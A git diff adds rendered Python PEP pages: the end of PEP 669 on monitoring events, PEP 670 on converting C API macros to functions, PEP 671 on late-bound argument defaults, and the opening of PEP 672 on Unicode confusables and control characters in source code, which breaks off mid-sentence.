Debuggers can use the PY_START and PY_RESUME events to be informed +when a code object is first encountered, so that any necessary breakpoints +can be inserted.

+
+
+
+

Coverage Tools

+

Coverage tools need to track which parts of the control graph have been +executed. To do this, they need to register for the PY_ events, +plus JUMP and BRANCH.

+

This information can then be converted back into a line-based report +after execution has completed.

+
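A possible registration for the branch-level part of such a tool, sketched under the same assumptions as the earlier examples (a full coverage tool would also handle the PY_ events):

import sys

ev = sys.monitoring.events
TOOL = sys.monitoring.COVERAGE_ID

arcs = set()

def record_arc(code, instruction_offset, destination_offset):
    arcs.add((code, instruction_offset, destination_offset))
    return sys.monitoring.DISABLE  # each arc only needs to be seen once

sys.monitoring.use_tool_id(TOOL, "toy-coverage")
sys.monitoring.register_callback(TOOL, ev.BRANCH, record_arc)
sys.monitoring.register_callback(TOOL, ev.JUMP, record_arc)
sys.monitoring.set_events(TOOL, ev.BRANCH | ev.JUMP)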
+
+

Profilers

+

Simple profilers need to gather information about calls. +To do this, profilers should register for the following events +(a minimal sketch follows the list):

+
    +
  • PY_START
  • +
  • PY_RESUME
  • +
  • PY_THROW
  • +
  • PY_RETURN
  • +
  • PY_YIELD
  • +
  • PY_UNWIND
  • +
  • CALL
  • +
  • C_RAISE
  • +
  • C_RETURN
  • +
+
+
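The sketch below counts calls using PY_START only; a real profiler would register for all of the events above and track timing as well (again, this example is illustrative, not part of the PEP):

import sys

ev = sys.monitoring.events
TOOL = sys.monitoring.PROFILER_ID

call_counts = {}

def on_py_start(code, instruction_offset):
    call_counts[code] = call_counts.get(code, 0) + 1

sys.monitoring.use_tool_id(TOOL, "toy-profiler")
sys.monitoring.register_callback(TOOL, ev.PY_START, on_py_start)
sys.monitoring.set_events(TOOL, ev.PY_START)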

Line based profilers

+

Line based profilers can use the LINE and JUMP events. +Implementers of profilers should be aware that instrumenting LINE +events will have a large impact on performance.

+
+

Note

+

Instrumenting profilers have significant overhead and will distort +the results of profiling. Unless you need exact call counts, +consider using a statistical profiler.

+
+
+
+
+
+

Rejected ideas

+

A draft version of this PEP proposed making the user responsible +for inserting the monitoring instructions, rather than having the VM do it. +However, that puts too much of a burden on the tools, and would make +attaching a debugger nearly impossible.

+

An earlier version of this PEP proposed storing events as enums:

+
class Event(enum.IntFlag):
+    PY_START = ...
+
+
+

However, that would prevent monitoring of code before the enum module was +loaded and could cause unnecessary overhead.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0669.rst

+

Last modified: 2024-02-07 11:51:52 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0670/index.html b/pep-0670/index.html new file mode 100644 index 00000000000..6dc8280ae67 --- /dev/null +++ b/pep-0670/index.html @@ -0,0 +1,768 @@ + + + + + + + + PEP 670 – Convert macros to functions in the Python C API | peps.python.org + + +
+
+


+ + +
+
+
+

PEP 670 – Convert macros to functions in the Python C API

+
+
Author:
+
Erlend Egeberg Aasland <erlend at python.org>, +Victor Stinner <vstinner at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
19-Oct-2021
+
Python-Version:
+
3.11
+
Post-History:
+
20-Oct-2021, +08-Feb-2022, +22-Feb-2022
+
Resolution:
+
Python-Dev thread
+
+
+
+
Table of Contents +
+
+

Abstract

+

Macros in the C API will be converted to static inline functions or +regular functions. This will help avoid macro pitfalls in C/C++, and +make the functions usable from other programming languages.

+

To avoid compiler warnings, function arguments of pointer types +will be cast to appropriate types using additional macros. +The cast will not be done in the limited C API version 3.11: +users who opt in to the new limited API may need to add casts to +the exact expected type.

+

To avoid introducing incompatible changes, macros which can be used as +l-value in an assignment will not be converted.

+
+
+

Rationale

+

The use of macros may have unintended adverse effects that are hard to +avoid, even for experienced C developers. Some issues have been known +for years, while others have been discovered recently in Python. +Working around macro pitfalls makes the macro code harder to read and +to maintain.

+

Converting macros to functions has multiple advantages:

+
    +
  • Functions don’t suffer from macro pitfalls, for example the following +ones described in GCC documentation:
      +
    • Misnesting
    • +
    • Operator precedence problems
    • +
    • Swallowing the semicolon
    • +
    • Duplication of side effects
    • +
    • Self-referential macros
    • +
    • Argument prescan
    • +
    • Newlines in arguments
    • +
    +

    Functions don’t need the following workarounds for macro +pitfalls, making them usually easier to read and to maintain than +similar macro code:

    +
      +
    • Adding parentheses around arguments.
    • +
    • Using line continuation characters if the function is written on +multiple lines.
    • +
    • Adding commas to execute multiple expressions.
    • +
    • Using do { ... } while (0) to write multiple statements.
    • +
    +
  • +
  • Argument types and the return type of functions are well defined.
  • +
  • Debuggers and profilers can retrieve the name of inlined functions.
  • +
  • Debuggers can put breakpoints on inlined functions.
  • +
  • Variables have a well-defined scope.
  • +
+

Converting macros and static inline functions to regular functions makes +these regular functions accessible to projects which use Python but +cannot use macros and static inline functions.

+
+
+

Specification

+
+

Convert macros to static inline functions

+

Most macros will be converted to static inline functions.

+

The following macros will not be converted:

+
    +
  • Object-like macros (i.e. those which don’t need parentheses and +arguments). For example:
      +
    • Empty macros. Example: #define Py_HAVE_CONDVAR.
    • +
    • Macros only defining a value, even if a constant with a well defined +type would be better. Example: #define METH_VARARGS 0x0001.
    • +
    +
  • +
  • Compatibility layer for different C compilers, C language extensions, +or recent C features. +Example: Py_GCC_ATTRIBUTE(), Py_ALWAYS_INLINE, Py_MEMCPY().
  • +
  • Macros used for definitions rather than behavior. +Example: PyAPI_FUNC, Py_DEPRECATED, Py_PYTHON_H.
  • +
  • Macros that need C preprocessor features, like stringification and +concatenation. Example: Py_STRINGIFY().
  • +
  • Macros which cannot be converted to functions. Examples: +Py_BEGIN_ALLOW_THREADS (contains an unpaired }), Py_VISIT +(relies on specific variable names), Py_RETURN_RICHCOMPARE (returns +from the calling function).
  • +
  • Macros which can be used as an l-value in assignments. This would be +an incompatible change and is out of the scope of this PEP. +Example: PyBytes_AS_STRING().
  • +
  • Macros which have different return types depending on the code path +or arguments.
  • +
+
+
+

Convert static inline functions to regular functions

+

Static inline functions in the public C API may be converted to regular +functions, but only if there is no measurable performance impact of +changing the function. +The performance impact should be measured with benchmarks.

+
+
+

Cast pointer arguments

+

Currently, most macros accepting pointers cast pointer arguments to +their expected types. For example, in Python 3.6, the Py_TYPE() +macro casts its argument to PyObject*:

+
#define Py_TYPE(ob) (((PyObject*)(ob))->ob_type)
+
+
+

The Py_TYPE() macro accepts the PyObject* type, but also any +pointer types, such as PyLongObject* and PyDictObject*.

+

Functions are strongly typed, and can only accept one type of argument.

+

To avoid compiler errors and warnings in existing code, when a macro is +converted to a function and the macro casts at least one of its arguments, +a new macro will be added to keep the cast. The new macro +and the function will have the same name.

+

Example with the Py_TYPE() +macro converted to a static inline function:

+
static inline PyTypeObject* Py_TYPE(PyObject *ob) {
+    return ob->ob_type;
+}
+#define Py_TYPE(ob) Py_TYPE((PyObject*)(ob))
+
+
+

The cast is kept for all pointer types, not only PyObject*. +This includes casts to void*: removing a cast to void* would emit +a new warning if the function is called with a const void* variable. +For example, the PyUnicode_WRITE() macro casts its data argument to +void*, and so it currently accepts const void* type, even though +it writes into data. This PEP will not change this.

+
+

Avoid the cast in the limited C API version 3.11

+

The casts will be excluded from the limited C API version 3.11 and newer. +When an API user opts into the new limited API, they must pass the expected +type or perform the cast.

+

As an example, Py_TYPE() will be defined like this:

+
static inline PyTypeObject* Py_TYPE(PyObject *ob) {
+    return ob->ob_type;
+}
+#if !defined(Py_LIMITED_API) || Py_LIMITED_API+0 < 0x030b0000
+#  define Py_TYPE(ob) Py_TYPE((PyObject*)(ob))
+#endif
+
+
+
+
+
+

Return type is not changed

+

When a macro is converted to a function, its return type must not change +to prevent emitting new compiler warnings.

+

For example, Python 3.7 changed the return type of PyUnicode_AsUTF8() +from char* to const char* (commit). +The change emitted new compiler warnings when building C extensions +expecting char*. This PEP doesn’t change the return type to prevent +this issue.

+
+
+
+

Backwards Compatibility

+

The PEP is designed to avoid C API incompatible changes.

+

Only C extensions explicitly targeting the limited C API version 3.11 +must now pass the expected types to functions: pointer arguments are no +longer cast to the expected types.

+

Function arguments of pointer types are still cast and return types are +not changed to prevent emitting new compiler warnings.

+

Macros which can be used as l-value in an assignment are not modified by +this PEP to avoid incompatible changes.

+
+
+

Examples of Macro Pitfalls

+
+

Duplication of side effects

+

Macros:

+
#define PySet_Check(ob) \
+    (Py_IS_TYPE(ob, &PySet_Type) \
+     || PyType_IsSubtype(Py_TYPE(ob), &PySet_Type))
+
+#define Py_IS_NAN(X) ((X) != (X))
+
+
+

If the ob or the X argument has a side effect, the side effect is +duplicated: it is executed twice, by PySet_Check() and Py_IS_NAN() respectively.

+

For example, the pos++ argument in the +PyUnicode_WRITE(kind, data, pos++, ch) code has a side effect. +This code is safe because the PyUnicode_WRITE() macro only uses its +3rd argument once and so does not duplicate the pos++ side effect.

+
+
+

Misnesting

+

Example from bpo-43181: Python macros don't shield arguments. The PyObject_TypeCheck() +macro before it was fixed:

+
#define PyObject_TypeCheck(ob, tp) \
+    (Py_IS_TYPE(ob, tp) || PyType_IsSubtype(Py_TYPE(ob), (tp)))
+
+
+

C++ usage example:

+
PyObject_TypeCheck(ob, U(f<a,b>(c)))
+
+
+

The preprocessor first expands it:

+
(Py_IS_TYPE(ob, f<a,b>(c)) || ...)
+
+
+

C++ "<" and ">" characters are not treated as brackets by the +preprocessor, so the Py_IS_TYPE() macro is invoked with 3 arguments:

+
    +
  • ob
  • +
  • f<a
  • +
  • b>(c)
  • +
+

The compilation fails with an error on Py_IS_TYPE() which only takes +2 arguments.

+

The bug is that the ob and tp arguments of PyObject_TypeCheck() +must be put between parentheses: replace Py_IS_TYPE(ob, tp) with +Py_IS_TYPE((ob), (tp)). In regular C code, these parentheses are +redundant, can be seen as a bug, and so are often forgotten when writing +macros.

+

To avoid Macro Pitfalls, the PyObject_TypeCheck() macro has been +converted to a static inline function: +commit.

+
+
+
+

Examples of hard to read macros

+
+

PyObject_INIT()

+

Example showing the usage of commas in a macro which has a return value.

+

Python 3.7 macro:

+
#define PyObject_INIT(op, typeobj) \
+    ( Py_TYPE(op) = (typeobj), _Py_NewReference((PyObject *)(op)), (op) )
+
+
+

Python 3.8 function (simplified code):

+
static inline PyObject*
+_PyObject_INIT(PyObject *op, PyTypeObject *typeobj)
+{
+    Py_TYPE(op) = typeobj;
+    _Py_NewReference(op);
+    return op;
+}
+
+#define PyObject_INIT(op, typeobj) \
+    _PyObject_INIT(_PyObject_CAST(op), (typeobj))
+
+
+
    +
  • The function doesn’t need the line continuation character "\".
  • +
  • It has an explicit "return op;" rather than the surprising +", (op)" syntax at the end of the macro.
  • +
  • It uses short statements on multiple lines, rather than being written +as a single long line.
  • +
  • Inside the function, the op argument has the well defined type +PyObject* and so doesn’t need casts like (PyObject *)(op).
  • +
  • Arguments don’t need to be put inside parentheses: use typeobj, +rather than (typeobj).
  • +
+
+
+

_Py_NewReference()

+

Example showing the usage of an #ifdef inside a macro.

+

Python 3.7 macro (simplified code):

+
#ifdef COUNT_ALLOCS
+#  define _Py_INC_TPALLOCS(OP) inc_count(Py_TYPE(OP))
+#  define _Py_COUNT_ALLOCS_COMMA  ,
+#else
+#  define _Py_INC_TPALLOCS(OP)
+#  define _Py_COUNT_ALLOCS_COMMA
+#endif /* COUNT_ALLOCS */
+
+#define _Py_NewReference(op) (                   \
+    _Py_INC_TPALLOCS(op) _Py_COUNT_ALLOCS_COMMA  \
+    Py_REFCNT(op) = 1)
+
+
+

Python 3.8 function (simplified code):

+
static inline void _Py_NewReference(PyObject *op)
+{
+    _Py_INC_TPALLOCS(op);
+    Py_REFCNT(op) = 1;
+}
+
+
+
+
+

PyUnicode_READ_CHAR()

+

This macro reuses arguments, and possibly calls PyUnicode_KIND multiple +times:

+
#define PyUnicode_READ_CHAR(unicode, index) \
+(assert(PyUnicode_Check(unicode)),          \
+ assert(PyUnicode_IS_READY(unicode)),       \
+ (Py_UCS4)                                  \
+    (PyUnicode_KIND((unicode)) == PyUnicode_1BYTE_KIND ? \
+        ((const Py_UCS1 *)(PyUnicode_DATA((unicode))))[(index)] : \
+        (PyUnicode_KIND((unicode)) == PyUnicode_2BYTE_KIND ? \
+            ((const Py_UCS2 *)(PyUnicode_DATA((unicode))))[(index)] : \
+            ((const Py_UCS4 *)(PyUnicode_DATA((unicode))))[(index)] \
+        ) \
+    ))
+
+
+

Possible implementation as a static inline function:

+
static inline Py_UCS4
+PyUnicode_READ_CHAR(PyObject *unicode, Py_ssize_t index)
+{
+    assert(PyUnicode_Check(unicode));
+    assert(PyUnicode_IS_READY(unicode));
+
+    switch (PyUnicode_KIND(unicode)) {
+    case PyUnicode_1BYTE_KIND:
+        return (Py_UCS4)((const Py_UCS1 *)(PyUnicode_DATA(unicode)))[index];
+    case PyUnicode_2BYTE_KIND:
+        return (Py_UCS4)((const Py_UCS2 *)(PyUnicode_DATA(unicode)))[index];
+    case PyUnicode_4BYTE_KIND:
+    default:
+        return (Py_UCS4)((const Py_UCS4 *)(PyUnicode_DATA(unicode)))[index];
+    }
+}
+
+
+
+
+
+

Macros converted to functions since Python 3.8

+

This is a list of macros already converted to functions between +Python 3.8 and Python 3.11. +Even though some converted macros (like Py_INCREF()) are very +commonly used by C extensions, these conversions did not significantly +impact Python performance and most of them didn’t break backward +compatibility.

+
+

Macros converted to static inline functions

+

Python 3.8:

+
    +
  • Py_DECREF()
  • +
  • Py_INCREF()
  • +
  • Py_XDECREF()
  • +
  • Py_XINCREF()
  • +
  • PyObject_INIT()
  • +
  • PyObject_INIT_VAR()
  • +
  • _PyObject_GC_UNTRACK()
  • +
  • _Py_Dealloc()
  • +
+
+
+

Macros converted to regular functions

+

Python 3.9:

+
    +
  • PyIndex_Check()
  • +
  • PyObject_CheckBuffer()
  • +
  • PyObject_GET_WEAKREFS_LISTPTR()
  • +
  • PyObject_IS_GC()
  • +
  • PyObject_NEW(): alias to PyObject_New()
  • +
  • PyObject_NEW_VAR(): alias to PyObjectVar_New()
  • +
+

To avoid performance slowdown on Python built without LTO, +private static inline functions have been added to the internal C API:

+
    +
  • _PyIndex_Check()
  • +
  • _PyObject_IS_GC()
  • +
  • _PyType_HasFeature()
  • +
  • _PyType_IS_GC()
  • +
+
+
+

Static inline functions converted to regular functions

+

Python 3.11:

+
    +
  • PyObject_CallOneArg()
  • +
  • PyObject_Vectorcall()
  • +
  • PyVectorcall_Function()
  • +
  • _PyObject_FastCall()
  • +
+

To avoid performance slowdown on Python built without LTO, a +private static inline function has been added to the internal C API:

+
    +
  • _PyVectorcall_FunctionInline()
  • +
+
+
+

Incompatible changes

+

While the other converted macros didn't break backward compatibility, +there is one exception.

+

The 3 macros Py_REFCNT(), Py_TYPE() and Py_SIZE() have been +converted to static inline functions in Python 3.10 and 3.11 to disallow +using them as l-value in assignment. It is an incompatible change made +on purpose: see bpo-39573 for +the rationale.

+

This PEP does not propose converting macros which can be used as l-value +to avoid introducing new incompatible changes.

+
+
+
+

Performance concerns and benchmarks

+

There have been concerns that converting macros to functions can degrade +performance.

+

This section explains performance concerns and shows benchmark results +using PR 29728, which +replaces the following static inline functions with macros:

+
    +
  • PyObject_TypeCheck()
  • +
  • PyType_Check(), PyType_CheckExact()
  • +
  • PyType_HasFeature()
  • +
  • PyVectorcall_NARGS()
  • +
  • Py_DECREF(), Py_XDECREF()
  • +
  • Py_INCREF(), Py_XINCREF()
  • +
  • Py_IS_TYPE()
  • +
  • Py_NewRef()
  • +
  • Py_REFCNT(), Py_TYPE(), Py_SIZE()
  • +
+

The benchmarks were run on Fedora 35 (Linux) with GCC 11 on a laptop with 8 +logical CPUs (4 physical CPU cores).

+
+

Static inline functions

+

First of all, converting macros to static inline functions has +negligible impact on performance: the measured differences are consistent +with noise due to unrelated factors.

+

Static inline functions were introduced in the C99 standard. Modern C +compilers have efficient heuristics to decide whether a function should be +inlined or not.

+

When a C compiler decides not to inline, there is likely a good reason. +For example, inlining may reuse a register, which would require saving and +restoring the register value on the stack, increasing stack memory usage, or +it may otherwise be less efficient.

+

Benchmark of the ./python -m test -j5 command on Python built in +release mode with gcc -O3, LTO and PGO:

+
    +
  • Macros (PR 29728): 361 sec +- 1 sec
  • +
  • Static inline functions (reference): 361 sec +- 1 sec
  • +
+

There is no significant performance difference between macros and +static inline functions when static inline functions are inlined.

+
+
+

Debug build

+

Performance in debug builds can suffer when macros are converted to +functions. This is compensated by better debuggability: debuggers can +retrieve function names, set breakpoints inside functions, etc.

+

On Windows, when Python is built in debug mode by Visual Studio, static +inline functions are not inlined.

+

On other platforms, ./configure --with-pydebug uses the -Og compiler +option on compilers that support it (including GCC and LLVM Clang). +-Og means “optimize debugging experience”. +Otherwise, the -O0 compiler option is used. +-O0 means “disable most optimizations”.

+

With GCC 11, gcc -Og can inline static inline functions, whereas +gcc -O0 does not inline static inline functions.

+

Benchmark of the ./python -m test -j10 command on Python built in +debug mode with gcc -O0 (that is, compiler optimizations, +including inlining, are explicitly disabled):

+
    +
  • Macros (PR 29728): 345 sec ± 5 sec
  • +
  • Static inline functions (reference): 360 sec ± 6 sec
  • +
+

Replacing macros with static inline functions makes Python +1.04x slower when the compiler does not inline static inline +functions.

+

Note that benchmarks should not be run on a Python debug build. +Moreover, using link-time optimization (LTO) and profile-guided optimization +(PGO) is recommended for best performance and reliable benchmarks. +PGO helps the compiler to decide if functions should be inlined or not.

+
+
+

Force inlining

+

The Py_ALWAYS_INLINE macro can be used to force inlining. This macro +uses __attribute__((always_inline)) with GCC and Clang, and +__forceinline with MSC.

+

Previous attempts to use Py_ALWAYS_INLINE didn’t show any benefit, and were +abandoned. See for example bpo-45094 +“Consider using __forceinline and __attribute__((always_inline)) on +static inline functions (Py_INCREF, Py_TYPE) for debug build”.

+

When the Py_INCREF() macro was converted to a static inline +function in 2018 (commit), +it was decided not to force inlining. The machine code was analyzed with +multiple C compilers and compiler options, and Py_INCREF() was always +inlined without having to force inlining. The only case where it was not +inlined was the debug build. See discussion in bpo-35059 “Convert Py_INCREF() and +PyObject_INIT() to inlined functions”.

+
+
+

Disabling inlining

+

On the other side, the Py_NO_INLINE macro can be used to disable +inlining. It can be used to reduce the stack memory usage, or to prevent +inlining on LTO+PGO builds, which generally inline code more aggressively: +see bpo-33720. The +Py_NO_INLINE macro uses __attribute__ ((noinline)) with GCC and +Clang, and __declspec(noinline) with MSC.

+

This technique is available, though we currently don’t know a concrete +function for which it would be useful. +Note that with macros, it is not possible to disable inlining at all.

+
+
+
+

Rejected Ideas

+
+

Keep macros, but fix some macro issues

+

Macros are always “inlined” with any C compiler.

+

The duplication of side effects can be worked around in the caller of +the macro.

+

People using macros should be considered “consenting adults”. People who +feel unsafe with macros should simply not use them.

+

These ideas are rejected because macros are error prone, and it is too easy +to miss a macro pitfall when writing and reviewing macro code. Moreover, macros +are harder to read and maintain than functions.

+
+
+
+

Post History

+

python-dev mailing list threads:

+ +
+
+

References

+
    +
  • bpo-45490: +[C API] PEP 670: Convert macros to functions in the Python C API +(October 2021).
  • +
  • What to do with unsafe macros +(March 2021).
  • +
  • bpo-43502: +[C-API] Convert obvious unsafe macros to static inline functions +(March 2021).
  • +
+
+
+

Version History

+
    +
  • Version 2:
      +
    • Stricter policy on not changing argument types and return type.
    • +
    • Better explain why pointer arguments require a cast to not emit new +compiler warnings.
    • +
    • Macros which can be used as l-values are no longer modified by the +PEP.
    • +
    • Macros having multiple return types are no longer modified by the +PEP.
    • +
    • Limited C API version 3.11 no longer casts pointer arguments.
    • +
    • No longer remove return values of macros “which should not have a +return value”.
    • +
    • Add “Macros converted to functions since Python 3.8” section.
    • +
    • Add “Benchmark comparing macros and static inline functions” +section.
    • +
    +
  • +
  • Version 1: First public version
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0670.rst

+

Last modified: 2023-10-04 23:18:07 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0671/index.html b/pep-0671/index.html new file mode 100644 index 00000000000..62dd81ba4a0 --- /dev/null +++ b/pep-0671/index.html @@ -0,0 +1,335 @@ + + + + + + + + PEP 671 – Syntax for late-bound function argument defaults | peps.python.org + + +
+
+


+ + +
+
+
+

PEP 671 – Syntax for late-bound function argument defaults

+
+
Author:
+
Chris Angelico <rosuav at gmail.com>
+
Discussions-To:
+
Python-Ideas thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Created:
+
24-Oct-2021
+
Python-Version:
+
3.12
+
Post-History:
+
24-Oct-2021, +01-Dec-2021
+
+
+
+
Table of Contents +
+
+

Abstract

+

Function parameters can have default values which are calculated during +function definition and saved. This proposal introduces a new form of +argument default, defined by an expression to be evaluated at function +call time.

+
+
+

Motivation

+

Optional function arguments, if omitted, often have some sort of logical +default value. When this value depends on other arguments, or needs to be +reevaluated each function call, there is currently no clean way to state +this in the function header.

+

Currently-legal idioms for this include:

+
# Very common: Use None and replace it in the function
+def bisect_right(a, x, lo=0, hi=None, *, key=None):
+    if hi is None:
+        hi = len(a)
+
+# Also well known: Use a unique custom sentinel object
+_USE_GLOBAL_DEFAULT = object()
+def connect(timeout=_USE_GLOBAL_DEFAULT):
+    if timeout is _USE_GLOBAL_DEFAULT:
+        timeout = default_timeout
+
+# Unusual: Accept star-args and then validate
+def add_item(item, *optional_target):
+    if not optional_target:
+        target = []
+    else:
+        target = optional_target[0]
+
+
+

In each form, help(function) fails to show the true default value. Each +one has additional problems, too: using None is only valid if None is not +itself a plausible function parameter; the custom sentinel requires a global +constant; and use of star-args implies that more than one argument could be +given.

+
+
+

Specification

+

Function default arguments can be defined using the new => notation:

+
def bisect_right(a, x, lo=0, hi=>len(a), *, key=None):
+def connect(timeout=>default_timeout):
+def add_item(item, target=>[]):
+def format_time(fmt, time_t=>time.time()):
+
+
+

The expression is saved in its source code form for the purpose of inspection, +and bytecode to evaluate it is prepended to the function’s body.

+

Notably, the expression is evaluated in the function’s run-time scope, NOT the +scope in which the function was defined (as are early-bound defaults). This +allows the expression to refer to other arguments.

+

Multiple late-bound arguments are evaluated from left to right, and can refer +to previously-defined values. Order is defined by the function, regardless of +the order in which keyword arguments may be passed.

+
+
def prevref(word="foo", a=>len(word), b=>a//2): # Valid +def selfref(spam=>spam): # UnboundLocalError +def spaminate(sausage=>eggs + 1, eggs=>sausage - 1): # Confusing, don't do this +def frob(n=>len(items), items=[]): # See below
+

Evaluation order is left-to-right; however, implementations MAY choose to do so +in two separate passes, first for all passed arguments and early-bound defaults, +and then a second pass for late-bound defaults. Otherwise, all arguments will be +assigned strictly left-to-right.

+
+

Rejected choices of spelling

+

While this document specifies a single syntax name=>expression, alternate +spellings are similarly plausible. The following spellings were considered:

+
def bisect(a, hi=>len(a)):
+def bisect(a, hi:=len(a)):
+def bisect(a, hi?=len(a)):
+def bisect(a, @hi=len(a)):
+
+
+

Since default arguments behave largely the same whether they’re early or late +bound, the chosen syntax hi=>len(a) is deliberately similar to the existing +early-bind syntax.

+

One reason for rejection of the := syntax is its behaviour with annotations. +Annotations go before the default, so in all syntax options, it must be +unambiguous (both to the human and the parser) whether this is an annotation, +a default, or both. The alternate syntax target:=expr runs the risk of +being misinterpreted as target:int=expr with the annotation omitted in +error, and may thus mask bugs. The chosen syntax target=>expr does not +have this problem.

+
+
+
+

How to Teach This

+

Early-bound default arguments should always be taught first, as they are the +simpler and more efficient way to evaluate arguments. Building on them, late +bound arguments are broadly equivalent to code at the top of the function:

+
def add_item(item, target=>[]):
+
+# Equivalent pseudocode:
+def add_item(item, target=<OPTIONAL>):
+    if target was omitted: target = []
+
+
+

A simple rule of thumb is: “target=expression” is evaluated when the function +is defined, and “target=>expression” is evaluated when the function is called. +Either way, if the argument is provided at call time, the default is ignored. +While this does not completely explain all the subtleties, it is sufficient to +cover the important distinction here (and the fact that they are similar).

+
+
+

Interaction with other proposals

+

PEP 661 attempts to solve one of the same problems as this does. It seeks to +improve the documentation of sentinel values in default arguments, where this +proposal seeks to remove the need for sentinels in many common cases. PEP 661 +is able to improve documentation in arbitrarily complicated functions (it +cites traceback.print_exception as its primary motivation, which has two +arguments which must both-or-neither be specified); on the other hand, many +of the common cases would no longer need sentinels if the true default could +be defined by the function. Additionally, dedicated sentinel objects can be +used as dictionary lookup keys, where PEP 671 does not apply.

+

A generic system for deferred evaluation has been proposed at times (not to be +confused with PEP 563 and PEP 649 which are specific to annotations). +While it may seem, on the surface, that late-bound argument defaults are of a +similar nature, they are in fact unrelated and orthogonal ideas, and both could +be of value to the language. The acceptance or rejection of this proposal would +not affect the viability of a deferred evaluation proposal, and vice versa. (A +key difference between generalized deferred evaluation and argument defaults is +that argument defaults will always and only be evaluated as the function begins +executing, whereas deferred expressions would only be realized upon reference.)

+
+
+

Implementation details

+

The following relates to the reference implementation, and is not necessarily +part of the specification.

+

Argument defaults (positional or keyword) have both their values, as already +retained, and an extra piece of information. For positional arguments, the +extras are stored in a tuple in __defaults_extra__, and for keyword-only, +a dict in __kwdefaults_extra__. If this attribute is None, it is +equivalent to having None for every argument default.

+

For each parameter with a late-bound default, the special value Ellipsis +is stored as the value placeholder, and the corresponding extra information +needs to be queried. If it is None, then the default is indeed the value +Ellipsis; otherwise, it is a descriptive string and the true value is +calculated as the function begins.

+

When a parameter with a late-bound default is omitted, the function will begin +with the parameter unbound. The function begins by testing for each parameter +with a late-bound default using a new opcode QUERY_FAST/QUERY_DEREF, and if +unbound, evaluates the original expression. This opcode (available only for +fast locals and closure variables) pushes True onto the stack if the given +local has a value, and False if not - meaning that it pushes False if LOAD_FAST +or LOAD_DEREF would raise UnboundLocalError, and True if it would succeed.

+

Out-of-order variable references are permitted as long as the referent has a +value from an argument or early-bound default.

+
+

Costs

+

When no late-bound argument defaults are used, the following costs should be +all that are incurred:

+
    +
  • Function objects require two additional pointers, which will be NULL
  • +
  • Compiling code and constructing functions have additional flag checks
  • +
  • Using Ellipsis as a default value will require run-time verification +to see if late-bound defaults exist.
  • +
+

These costs are expected to be minimal (on 64-bit Linux, this increases all +function objects from 152 bytes to 168), with virtually no run-time cost when +late-bound defaults are not used.

+
+
+

Backward incompatibility

+

Where late-bound defaults are not used, behaviour should be identical. Care +should be taken if Ellipsis is found, as it may not represent itself, but +beyond that, tools should see existing code unchanged.

+
+
+
+

References

+

https://github.com/rosuav/cpython/tree/pep-671

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0671.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0672/index.html b/pep-0672/index.html new file mode 100644 index 00000000000..dd55917d6e7 --- /dev/null +++ b/pep-0672/index.html @@ -0,0 +1,496 @@ + + + + + + + + PEP 672 – Unicode-related Security Considerations for Python | peps.python.org + + +
+
+


+ + +
+
+
+

PEP 672 – Unicode-related Security Considerations for Python

+
+
Author:
+
Petr Viktorin <encukou at gmail.com>
+
Status:
+
Active
+
Type:
+
Informational
+
Created:
+
01-Nov-2021
+
Post-History:
+
01-Nov-2021
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document explains possible ways to misuse Unicode to write Python +programs that appear to do something other than what they actually do.

+

This document does not give any recommendations or solutions.

+
+
+

Introduction

+

Unicode is a system for handling all kinds of written language. +It aims to allow any character from any human language to be +used. Python code may consist of almost all valid Unicode characters. +While this allows programmers from all around the world to express themselves, +it also allows writing code that is potentially confusing to readers.

+

It is possible to misuse Python’s Unicode-related features to write code that +appears to do something other than what it does. +Evildoers could take advantage of this to trick code reviewers into +accepting malicious code.

+

The possible issues generally can’t be solved in Python itself without +excessive restrictions of the language. +They should be solved in code editors and review tools +(such as diff displays), by enforcing project-specific policies, +and by raising awareness of individual programmers.

+

This document purposefully does not give any solutions +or recommendations: it is rather a list of things to keep in mind.

+

This document is specific to Python. +For general security considerations in Unicode text and source code, +see Unicode technical reports [tr36], [tr39], and [tr55].

+
+
+

Acknowledgement

+

Investigation for this document was prompted by CVE-2021-42574, +Trojan Source Attacks, reported by Nicholas Boucher and Ross Anderson, +which focuses on Bidirectional override characters and homoglyphs in a variety +of programming languages.

+
+
+

Confusing Features

+

This section lists some Unicode-related features that can be surprising +or misusable.

+
+

ASCII-only Considerations

+

ASCII is a subset of Unicode, consisting of the most common symbols, numbers, +Latin letters and control characters.

+

While issues with the ASCII character set are generally well understood, +they’re presented here to help build a better understanding of the non-ASCII cases.

+
+

Confusables and Typos

+

Some characters look alike. +Before the age of computers, many mechanical typewriters lacked the keys for +the digits 0 and 1: users typed O (capital o) and l +(lowercase L) instead. Human readers could tell them apart by context only. +In programming languages, however, distinction between digits and letters is +critical – and most fonts designed for programmers make it easy to tell them +apart.

+

Similarly, in fonts designed for human languages, the uppercase “I” and +lowercase “l” can look similar. Or the letters “rn” may be virtually +indistinguishable from the single letter “m”. +Again, programmers’ fonts make these pairs of confusables +noticeably different.

+

However, what is “noticeably” different always depends on the context. +Humans tend to ignore details in longer identifiers: the variable name +accessibi1ity_options can still look indistinguishable from +accessibility_options, while they are distinct for the compiler. +The same can be said for plain typos: most humans will not notice the typo in +responsbility_chain_delegate.

+
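A small demonstration of the point (this snippet is illustrative, not from the original text); the two names below differ only in a digit 1 standing in for the letter l:

accessibility_options = ["high-contrast"]
accessibi1ity_options = []   # "1" (the digit one), not "l" (lowercase L)

# Two distinct variables, though many readers will not notice:
assert accessibility_options != accessibi1ity_options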
+
+

Control Characters

+

Python generally considers all CR (\r), LF (\n), and CR-LF +pairs (\r\n) as end-of-line characters. +Most code editors do as well, but there are editors that display “non-native” +line endings as unknown characters (or nothing at all), rather than ending +the line, displaying this example:

+
# Don't call this function:
+fire_the_missiles()
+
+
+

as a harmless comment like:

+
# Don't call this function:⬛fire_the_missiles()
+
+
+

CPython may treat the control character NUL (\0) as end of input, +but many editors simply skip it, possibly showing code that Python will not +run as a regular part of a file.

+

Some characters can be used to hide/overwrite other characters when source is +listed in common terminals. For example:

+
